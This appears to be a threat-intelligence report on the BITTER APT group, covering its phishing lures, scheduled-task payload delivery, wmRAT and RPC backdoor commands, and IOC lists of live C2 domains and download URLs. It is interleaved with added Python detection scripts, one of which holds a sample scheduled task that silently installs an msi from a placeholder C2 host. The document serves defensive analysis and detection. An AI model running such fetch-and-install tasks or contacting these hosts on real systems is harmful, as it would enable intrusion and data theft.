Group Background
The BITTER group, also known as APT-C-08 and T-APT-17, is an advanced persistent threat (APT) group believed to have a South Asian background. The group has been active since November 2013 and mainly focuses on Pakistan and China. Its targets mainly include government departments, the power industry, and military industry-related units, with the intention of stealing sensitive information. QiAnXin's internal tracking number is APT-Q-37.
It was not until 2016 that the foreign security vendor Forcepoint disclosed the existence of the group for the first time [1]; it had not been discovered before. Forcepoint named it "BITTER" based on the network communication headers of the remote access tool (RAT) used by the group. In the same year, QiAnXin Threat Intelligence Center discovered a related attack in China and named the group "Manlinghua".
Since being exposed, the group has modified its packet structure and no longer uses "BITTER" as the packet identifier. At this point, BITTER had officially surfaced, and as its attack activities continue to be discovered and disclosed, the full picture of the group becomes increasingly clear.
The group has a strong political background and mainly targets Pakistan and China; in 2018, activity against Saudi Arabia was also discovered [2]. Its attacks target government departments, electric power, and military industry-related units with the intention of stealing sensitive information. In 2019 it also intensified attacks on China's import and export sector.
Interestingly, multiple reports have pointed out that the BITTER group is inextricably linked to several other attack groups suspected to come from the same South Asian country, including Patchwork and Donot. This reflects the complex web of connections surrounding the BITTER group in South Asia.
Overview
The RedDrip Team of QiAnXin Threat Intelligence Center has been tracking major APT groups around the world. While tracking APT groups in South Asia, we found that the BITTER group has been very active recently. This article is a review of the past period: it shares the BITTER group's attack methods, reveals its techniques, targets and motivations, and offers security suggestions for relevant organizations.
Since the publication of ""Operation Magichm": a brief discussion of the BITTER group's CHM file delivery and follow-up operations" [3] in March 2021, the group has stuck with its tried-and-tested approach of delivering malicious chm files through spear-phishing emails. The picture below shows the entire attack process as disclosed in the previous article.
This year, BITTER still delivers malicious compressed packages through spear-phishing emails. The packages usually contain malicious chm files, and sometimes Office files carrying exploits. The entire attack flow chart is as follows:
It can be seen that BITTER is still adept at using chm files to create scheduled tasks that fetch the follow-up stage; the subsequent msi files are delivered selectively, and the msi file is usually equipped with BITTER's latest attack weapon, wmRAT. This weapon was only disclosed in the past two years and has been continuously expanded and updated; it now supports more than ten remote control commands.
Some of the decoy emails we captured during threat hunting look like this:
The compressed packages usually contain malicious chm files.
Sometimes they instead contain xlsx files that carry exploits.
These exploit known Equation Editor vulnerabilities to create scheduled tasks and download the subsequent msi files.
In addition, we also discovered a new technique in which BITTER uses PowerPoint mouse-click events to create scheduled tasks.
MSI file
The scheduled tasks created by BITTER usually request the C2 once every 15 to 20 minutes to download the subsequent payload. The request usually includes the computer name and user name, and the backend creates a folder for that victim; the msi file is then uploaded via FTP into the specified victim directory [4].
Recently, we observed that BITTER dropped two similar msi Trojans. The captured sample information is as follows:
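The following script is an added example, not code from this report or from the group's tooling. It triages exported scheduled-task XML for the beaconing pattern just described: a repetition interval in the 15 to 20 minute range, an action that runs a download-capable binary such as msiexec.exe against a remote URL, and the computer/user name embedded in that request. Both task definitions are constructed for illustration, the C2 hostname is a placeholder, and the `t:` namespace is the real Task Scheduler schema namespace. Task files under C:\Windows\System32\Tasks are UTF-16 XML, so read them as bytes and decode before passing them in.

```python
"""Triage exported Windows scheduled-task XML for the beaconing pattern
described above (added example, not code from the report).

Flags: a short repetition interval, an action that runs a download/execute
capable binary such as msiexec.exe, a remote URL in the arguments, and the
host/user identity embedded in that request."""
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML (schtasks /xml exports, C:\Windows\System32\Tasks).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Binaries commonly used to fetch or run a second stage; msiexec and powershell are
# the ones the report mentions, the rest are added for coverage.
DOWNLOAD_EXECUTE_BINARIES = {"msiexec", "powershell", "cmd", "mshta", "certutil", "bitsadmin", "curl"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
IDENTITY_RE = re.compile(r"%(COMPUTERNAME|USERNAME|USERDOMAIN)%", re.IGNORECASE)

# CONSTRUCTED sample: what a task dropped by a lure could look like. The hostname is a placeholder.
SUSPICIOUS_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <StartBoundary>2023-11-01T09:00:00</StartBoundary>
      <Repetition><Interval>PT15M</Interval></Repetition>
    </TimeTrigger>
  </Triggers>
  <Actions>
    <Exec>
      <Command>msiexec.exe</Command>
      <Arguments>/i http://c2-placeholder.invalid/%COMPUTERNAME%-%USERNAME%/update.msi /qn</Arguments>
    </Exec>
  </Actions>
</Task>"""

# CONSTRUCTED benign sample: a daily vendor updater with no remote URL.
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2023-11-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions>
    <Exec>
      <Command>C:\\Program Files\\ExampleVendor\\updater.exe</Command>
      <Arguments>/check</Arguments>
    </Exec>
  </Actions>
</Task>"""


def parse_iso_duration_minutes(text):
    """Convert an ISO 8601 duration such as PT15M, PT1H20M or P1D to minutes; None if malformed."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", text.strip())
    if not m or not any(m.groups()):
        return None
    days, hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return days * 1440 + hours * 60 + minutes + seconds / 60


def triage_task(xml_text, max_beacon_minutes=30):
    """Return the findings for one task definition and a verdict (two or more findings)."""
    root = ET.fromstring(xml_text)
    findings = []
    for interval in root.iterfind(".//t:Repetition/t:Interval", namespaces=NS):
        minutes = parse_iso_duration_minutes(interval.text or "")
        if minutes is not None and minutes <= max_beacon_minutes:
            findings.append(f"short repetition interval {interval.text} ({minutes:g} min)")
    for action in root.iterfind(".//t:Actions/t:Exec", namespaces=NS):
        command = (action.findtext("t:Command", default="", namespaces=NS) or "").strip().strip('"')
        args = action.findtext("t:Arguments", default="", namespaces=NS) or ""
        binary = command.lower().replace("/", "\\").rsplit("\\", 1)[-1]
        if binary.endswith(".exe"):
            binary = binary[:-4]
        if binary in DOWNLOAD_EXECUTE_BINARIES:
            findings.append(f"action runs {binary}")
        url = URL_RE.search(args)
        if url:
            findings.append(f"action references remote URL {url.group(0)}")
        ident = IDENTITY_RE.search(args)
        if ident:
            findings.append(f"host/user identity {ident.group(0)} embedded in request")
    return {"findings": findings, "suspicious": len(findings) >= 2}


if __name__ == "__main__":
    for label, xml_text in (("lure task", SUSPICIOUS_TASK_XML), ("vendor updater", BENIGN_TASK_XML)):
        result = triage_task(xml_text)
        print(label, "->", "SUSPICIOUS" if result["suspicious"] else "ok")
        for finding in result["findings"]:
            print("   ", finding)
```

Running it over every file in the Tasks directory and sorting by the number of findings gives a quick hunt list. A single finding on its own (a short interval, for instance) is common in legitimate software, which is why the verdict requires at least two.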
| MD5 | Type |
|---|---|
| d7c3e044df73127776a5bd4cd031de30 | Microsoft Installer (MSI) |
| 19db308f6e83593824cc912aad18e3b4 | Microsoft Installer (MSI) |
Among them, when d7c3e044df73127776a5bd4cd031de30 is executed with the system's msiexec.exe, the latest version of wmRAT is dropped into the Local directory and executed. Opening the msi with 7-Zip shows wmRAT packaged inside.
19db308f6e83593824cc912aad18e3b4 drops files.cab into the %temp% directory and then decompresses it; the archive contains the white (legitimate) program MSOutlookServices.exe and the malicious file OLMAPI32.dll. Likewise, 7-Zip shows both packaged inside the msi file.
Sample analysis
wmRAT
BITTER's wmRAT was first disclosed in 2022. At that time it had only 16 remote control commands, half of which had no actual function, indicating that the BITTER group was actively developing the Trojan.
The wmRAT captured this time adds network connectivity sniffing.
In addition, the number of remote control commands has been increased to 22, though some commands without actual function are still retained.
Some of the remote control commands it executes are shown in the following table:
| Command | Function |
|---|---|
| 5 | Send screenshot data to the server |
| 6 | Receive file data |
| 8 | Receive information from the server, search for the specified file, process it and send it to the server |
| 10 | Open the specified URL and obtain the file |
| 11 | Find files in the specified directory and perform operations |
| 13 | Search for files in the specified directory and send file information to the server |
| 15 | Gather information to upload, including computer name, user name, disk usage, etc. |
| 16 | Use PowerShell to execute commands, create pipes to obtain data, etc. |
| 20 | Close the specified file stream |
| 21 | Write data to the specified file stream |
| 23 | Open the specified file stream and transfer data to the server |
| 26 | Send file data to the remote server and calculate the sending progress |
Backdoor
The msi sample was captured by us from BITTER's infrastructure officedocuments.info and was named msos.msi when downloaded. It uses the "white plus black" loading technique (a legitimate signed executable side-loading a malicious DLL) to evade antivirus monitoring.
It uses cnfnot32.exe, a Microsoft-signed program related to Outlook conflict notes, as the white program to load the malicious OLMAPI32.dll.
OLMAPI32.dll differs from conventional Trojans in that it uses RPC to interact with the server. This Trojan was recently analyzed in detail by a peer; here we only add some supplementary points rather than a full analysis.
The information it collects includes the following:
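The following is an added example, not code from the report, showing how the "white plus black" side-loading pattern above can be spotted in image-load telemetry. The records are a constructed join of a process-creation event (host image and its signer) with a Sysmon-style image-load event (loaded DLL and whether it is signed); the paths, user name and third-party vendor are placeholders, while cnfnot32.exe and OLMAPI32.dll are the file names given in the report. Whether a DLL is signed, and by whom, comes from the telemetry source; this script only scores the fields it is given.

```python
"""Spot the "white plus black" DLL side-loading pattern described above over
image-load telemetry (added example, not code from the report).

Records are a CONSTRUCTED join of a process-creation event (host image and its
signer) with a Sysmon-style image-load event (loaded DLL and whether it is signed)."""
import re

# CONSTRUCTED records. Paths, user name and the third-party vendor are placeholders;
# cnfnot32.exe / OLMAPI32.dll are the file names named in the report.
SAMPLE_RECORDS = """\
HostImage: C:\\Users\\victim\\AppData\\Local\\Temp\\cnfnot32.exe
HostSigner: Microsoft Corporation
LoadedImage: C:\\Users\\victim\\AppData\\Local\\Temp\\OLMAPI32.dll
LoadedSigned: false

HostImage: C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE
HostSigner: Microsoft Corporation
LoadedImage: C:\\Program Files\\Microsoft Office\\root\\Office16\\OLMAPI32.dll
LoadedSigned: true

HostImage: C:\\Users\\victim\\AppData\\Local\\Programs\\ExampleEditor\\editor.exe
HostSigner: Example Vendor Ltd
LoadedImage: C:\\Users\\victim\\AppData\\Local\\Programs\\ExampleEditor\\libcrypto.dll
LoadedSigned: true
"""

# Directories a standard user can write to; a DLL here can be planted without admin rights.
USER_WRITABLE_MARKERS = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\users\\public\\",
                         "\\programdata\\", "\\temp\\", "\\downloads\\")
TRUSTED_INSTALL_RE = re.compile(r"^[a-z]:\\(program files( \(x86\))?|windows)\\")
# Office DLL names whose legitimate copy lives under the Office install directory.
# Only the one from the report is listed; extend it from a clean Office install.
KNOWN_OFFICE_DLLS = {"olmapi32.dll"}


def norm(path):
    """Lower-case, backslash-only form so substring checks are case-insensitive."""
    return path.lower().replace("/", "\\")


def parse_records(text):
    """Parse blank-line separated 'Key: value' records into dicts."""
    records = []
    for chunk in text.strip().split("\n\n"):
        rec = {}
        for line in chunk.splitlines():
            key, _, value = line.partition(": ")
            rec[key.strip()] = value.strip()
        records.append(rec)
    return records


def assess(rec):
    """Score one host/DLL pair; two or more reasons raise an alert."""
    host, loaded = norm(rec["HostImage"]), norm(rec["LoadedImage"])
    host_is_microsoft = "microsoft" in rec.get("HostSigner", "").lower()
    reasons = []
    if any(m in loaded for m in USER_WRITABLE_MARKERS):
        reasons.append("DLL loaded from a user-writable directory")
    if host_is_microsoft and not TRUSTED_INSTALL_RE.match(host):
        reasons.append("Microsoft-signed host binary running outside Program Files/Windows")
    dll_name = loaded.rsplit("\\", 1)[-1]
    if dll_name in KNOWN_OFFICE_DLLS and "\\microsoft office\\" not in loaded:
        reasons.append(f"{dll_name} loaded from outside the Office install directory")
    if host_is_microsoft and rec.get("LoadedSigned", "").lower() == "false":
        reasons.append("Microsoft-signed host loading an unsigned DLL")
    return {"host": rec["HostImage"], "dll": rec["LoadedImage"], "reasons": reasons,
            "alert": len(reasons) >= 2}


def analyze(text):
    """Assess every record in a telemetry dump."""
    return [assess(rec) for rec in parse_records(text)]


if __name__ == "__main__":
    for r in analyze(SAMPLE_RECORDS):
        print("ALERT" if r["alert"] else "ok   ", r["host"], "->", r["dll"])
        for reason in r["reasons"]:
            print("       ", reason)
```

The third record shows why a single reason is not enough: per-user installed software legitimately loads its own DLLs from AppData\Local, so only the combination of a relocated Microsoft-signed host with an unsigned or out-of-place DLL is escalated.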
- Host Name
- OS Name
- OS Version
- OS Build Type
- Registered Owner
- RegisteredOrganization
- Product ID
- Install Date
- System Manufacturer
- System Model
- System type
- Processor(s)
- BiosVersion
- BIOSVENDOR
- BIOS Date
- Boot Device
- System Locale
- Input Locale
- Time zone
- TotalPhysicalMemory
- AvailablePhysicalMemory
- Virtual Memory: Max Size
- Virtual Memory: Available
- Virtual Memory: In Use
- PageFileLocation
- Domain
It creates scheduled tasks for persistence.
It uses RPC for communication, on port 443.
The remote control commands it supports are as follows:
| Command | Function |
|---|---|
| ID_ | Identify the victim |
| INF | Upload collected information |
| DN_ | Download |
| RUN | Execute the specified file |
| DLY | Sleep |
| CMD | Execute a remote command |
Attribution and Correlation
By performing a similarity search in the sample library, we found samples from the same batch as the backdoor described above. The sample size, structure, creation time, etc. are all consistent; the only difference is the C2.
| MD5 | C2 |
|---|---|
| 09a9e1b03f7d7de4340bc5f9e656b798 | msdata.ddns.net |
| 893060bff7da03f5555ecc9931d0c700 | outlook-updates.ddns.net |
| a6ee959ce128421317f8d97f9f312c78 | msoutllook.ddns.net |
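The following is an added example, not code from the report, covering two of the steps described on this page: the 7-Zip inspection of the msi files in the "MSI file" section (an MSI is an OLE compound file, and the embedded executables can be carved out of it), and the similarity search just described (size, compile timestamp and section layout as a structural fingerprint, so that samples from one build batch cluster together even when the embedded C2 string differs). All sample bytes are constructed here; the PE images are minimal header-only stubs, the OLE container is only the magic plus padding, and only the three C2 names from the table above are taken from the report.

```python
"""Two of the steps described above, as an added example (not code from the report):
(1) confirm an MSI is an OLE compound file and carve the PE images packaged inside it,
(2) fingerprint each PE by size, compile timestamp and section layout so that samples
from the same build batch cluster together even when the embedded C2 string differs.
All sample bytes are CONSTRUCTED; no real malware is embedded."""
import struct
from collections import defaultdict

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # MSI and legacy Office files are OLE compound files
CAB_MAGIC = b"MSCF"


def container_type(blob):
    """Classify a file by its leading magic bytes."""
    if blob.startswith(OLE_MAGIC):
        return "ole-compound"
    if blob.startswith(CAB_MAGIC):
        return "cab"
    if blob.startswith(b"MZ"):
        return "pe"
    return "unknown"


def parse_pe(blob, base=0):
    """Parse the COFF header and section table of a PE starting at `base`; None if it is not one."""
    if blob[base:base + 2] != b"MZ" or len(blob) < base + 0x40:
        return None
    pe = base + struct.unpack_from("<I", blob, base + 0x3C)[0]        # e_lfanew
    if blob[pe:pe + 4] != b"PE\0\0" or len(blob) < pe + 24:
        return None
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, pe + 4)
    sections = []
    for i in range(nsections):
        off = pe + 24 + opt_size + 40 * i
        if len(blob) < off + 40:
            return None
        name, _, _, raw_size, _, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", blob, off)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), raw_size, flags))
    return {"machine": machine, "timestamp": timestamp, "sections": sections}


def carve_embedded_pes(blob):
    """Offsets of every valid PE header inside a container (e.g. the binary streams of an MSI)."""
    found, pos = [], blob.find(b"MZ")
    while pos >= 0:
        if parse_pe(blob, pos) is not None:
            found.append(pos)
        pos = blob.find(b"MZ", pos + 2)
    return found


def structural_fingerprint(blob):
    """(size, compile timestamp, section layout): the features the report uses to call samples homologous."""
    info = parse_pe(blob)
    return None if info is None else (len(blob), info["timestamp"], tuple(info["sections"]))


def cluster_by_structure(samples):
    """Group {name: bytes} by fingerprint; a changed C2 string of equal length stays in the same cluster."""
    clusters = defaultdict(list)
    for name, blob in samples.items():
        fp = structural_fingerprint(blob)
        if fp is not None:
            clusters[fp].append(name)
    return sorted(sorted(names) for names in clusters.values())


def build_fake_pe(timestamp, c2):
    """CONSTRUCTED: a minimal PE-shaped blob (DOS header, COFF header, .text and .data) for the demo."""
    opt_size, text_ptr, data_ptr = 0xE0, 0x200, 0x400
    hdr = bytearray(b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40))       # e_lfanew -> 0x40
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, timestamp, 0, 0, opt_size, 0x2102)
    hdr += b"\0" * opt_size                                                    # optional header (zeroed)
    hdr += struct.pack("<8sIIIIIIHHI", b".text", 0x100, 0x1000, 0x100, text_ptr, 0, 0, 0, 0, 0x60000020)
    hdr += struct.pack("<8sIIIIIIHHI", b".data", 0x40, 0x2000, 0x40, data_ptr, 0, 0, 0, 0, 0xC0000040)
    image = hdr.ljust(text_ptr, b"\0") + b"\xCC" * 0x100                      # int3 filler as "code"
    image = image.ljust(data_ptr, b"\0") + c2.encode().ljust(0x40, b"\0")     # C2 string in .data
    return bytes(image)


def build_fake_msi(pe_blob):
    """CONSTRUCTED: OLE magic plus padding, then the PE at a sector boundary (512 bytes)."""
    return OLE_MAGIC.ljust(512, b"\0") + pe_blob + b"\0" * 16


def build_sample_set():
    """CONSTRUCTED: three 'same batch' samples differing only in C2 (the C2 names are from the report)."""
    batch = 1_700_000_000
    return {
        "sample_a": build_fake_pe(batch, "msdata.ddns.net"),
        "sample_b": build_fake_pe(batch, "outlook-updates.ddns.net"),
        "sample_c": build_fake_pe(batch, "msoutllook.ddns.net"),
        "unrelated": build_fake_pe(1_650_000_000, "unrelated.invalid"),
    }


if __name__ == "__main__":
    msi = build_fake_msi(build_fake_pe(1_700_000_000, "c2-placeholder.invalid"))
    print(container_type(msi), "embedded PE at", carve_embedded_pes(msi))
    for group in cluster_by_structure(build_sample_set()):
        print("cluster:", group)
```

On real files, run `carve_embedded_pes` on the msi (or on the extracted files.cab after decompression) and feed each carved image to `structural_fingerprint`; the fingerprint deliberately ignores the raw bytes of the sections, which is what lets a rebuilt sample with a different C2 of the same length land in the same cluster as its siblings.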
Summary
Through tracking, we found that the BITTER group has been very active recently. It establishes a foothold through social engineering and is adept at using scheduled tasks to obtain subsequent payloads. It is worth mentioning that it uses victim information to create corresponding directories and only delivers subsequent payloads to victims of interest, which effectively blocks analysis by most researchers. This is the root cause of why, after hunting the BITTER group's malicious chm files and accessing its infrastructure, the msi file downloaded back is always 0 KB. In addition, the BITTER group is also trying to update its arsenal and use new Trojans to gain more.
Responding to attacks by APT groups is a complex and arduous task that requires organizations and individuals to take comprehensive cybersecurity measures, including strengthening network defenses, regular vulnerability patching, training personnel to identify threats, the use of advanced security tools, and continuous monitoring.
Protection Suggestions
QiAnXin Threat Intelligence Center reminds users to beware of phishing attacks. Do not open links from unknown sources shared on social media, do not click to execute email attachments from unknown sources, do not run unknown files with exaggerated titles, and do not install apps from informal sources. Back up important files in a timely manner and update and install patches.
If you need to run and install applications from unknown sources, you can first identify them through the QiAnXin Threat Intelligence File In-depth Analysis Platform (https://sandbox.ti.qianxin.com/sandbox/page). Currently, it supports in-depth analysis of files in multiple formats including Windows and Android platforms.
Currently, the full range of products based on the threat intelligence data of QiAnXin Threat Intelligence Center, including the QiAnXin Threat Intelligence Platform (TIP), Tianqing, the Tianyan Advanced Threat Detection System, QiAnXin NGSOC and QiAnXin Situational Awareness, all support accurate detection of such attacks.
Partial IOCs
MD5
5c3c496869eab67c5742d522f9b35743
2fb6ffb8bd8861943893127d2956749b
9081f304fa2cc059a501e27aed2b31eb
e19dda58beebac867b334fe6bb3f9853
aa3fdb9b07a6dd926a7d5d4f9ce2a824
513b13ec23c08becdde6befb2cba0de7
86b57b0ec360f45331fc5e4eb5c99611
9cee927ab9dbfcee1105f6164d4c517e
95968f3597d61251724f22a6bbeb3dd7
a4c3fa2f91090cff7eb3933ec1442200
47bf243e41009b660a4610c84af835e9
485b6e2bef303251789827d7829e3a3e
ba068724f569d98d56fcfb473449c8df
067d2b13cd93a3c202f601f399926ae2
4ed5d896869949b42e55fcb579e2c689
8b15c4a11df2deea9ad4699ece085a6f
cce89f4956a5c8b1bec82b21e371645b
edcd2d0c8e43f48c853788cf32f78653
1b0748d7ed0bbfbdaa039c2cd0bd2d8e
79a0285313c1f0f4b6369c4a0469244d
515be466eca3c803be66e40c3a84f778
c3e0e2dda8485e56bfcf26b36ada4da5
5c2c1a1fe951591402c36c1a5a240612
f7d293e1ef4181cfb08c9e0a81795eba
a7e8d75eae4f1cb343745d9dd394a154
5df9468112e21c712474483793537aed
a6ee959ce128421317f8d97f9f312c78
893060bff7da03f5555ecc9931d0c700
09a9e1b03f7d7de4340bc5f9e656b798
URL
http://officedocuments.info/live/msos.msi
https://bluelotus.mail-gdrive.com/Services.msi
C2
deriksystemspartens.com
daveonenewtestpanel.com
novasapothecary.com
farleysmxpph.com
folkmusicstreams.com
xiuxonlinehost.com
vsetmediasvc.com
uxmesysconsole.com
grounpackcluepik.com
devqrytoprar.net
erswuniconsharing.com
outlook-services.ddns.net
msoutllook.ddns.net
outlook-updates.ddns.net
msdata.ddns.net
bluelotus.mail-gdrive.com
officedocuments.info
Reference links
[1]. https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan
[2]. https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/
[3]. https://ti.qianxin.com/blog/articles/%22operation-magichm%22:CHM-file-release-and-subsequent-operation-of-BITTER-organization/
[4]. https://ti.qianxin.com/blog/articles/operation-tejas-a-dead-elephant-curled-up-in-the-kunlun-mountains/